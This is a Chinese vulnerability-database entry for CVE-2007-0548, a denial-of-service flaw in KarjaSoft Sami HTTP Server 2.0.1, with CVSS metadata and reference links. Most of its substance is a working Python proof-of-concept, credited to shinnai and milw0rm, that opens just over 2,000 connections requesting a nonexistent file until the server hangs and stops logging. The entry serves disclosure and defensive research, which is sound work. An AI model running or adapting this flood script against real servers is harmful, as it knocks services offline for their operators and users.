KarjaSoft Sami HTTP Server 拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112065 漏洞类型 未知
发布时间 2007-01-23 更新时间 2007-01-29
CVE编号 CVE-2007-0548 CNNVD-ID CNNVD-200701-479
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3182
https://www.securityfocus.com/bid/86732
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-479
|漏洞详情
KarjaSoftSamiHTTPServer2.0.1版本存在拒绝服务漏洞,远程攻击者可以借助对不存在的对象的大量请求,引起拒绝服务攻击(后台程序hang)。
|漏洞EXP
#!/usr/bin/env python
import socket

print "-----------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer,
stops"
print "to write to log file and the admin will be unable to kick or ban
users."
print "The only thing you can do is to kill the process."
print "-----------------------------------------------------------------------"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",80))
   for i in range (0,2004):
       request =  "GET /some.txt HTTP/1.0 \n\n"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       print i
except:
   print "Unable to connect. exiting."

# milw0rm.com [2007-01-23]
|受影响的产品
KarjaSoft Sami HTTP Server 2.0.1
|参考资料

来源:XF
名称:sami-http-request-dos(31690)
链接:http://xforce.iss.net/xforce/xfdb/31690
来源:MILW0RM
名称:3182
链接:http://www.milw0rm.com/exploits/3182
来源:SECUNIA
名称:23901
链接:http://secunia.com/advisories/23901
来源:OSVDB
名称:31623
链接:http://osvdb.org/31623
来源:MILW0RM
名称:3182
链接:http://milw0rm.com/exploits/3182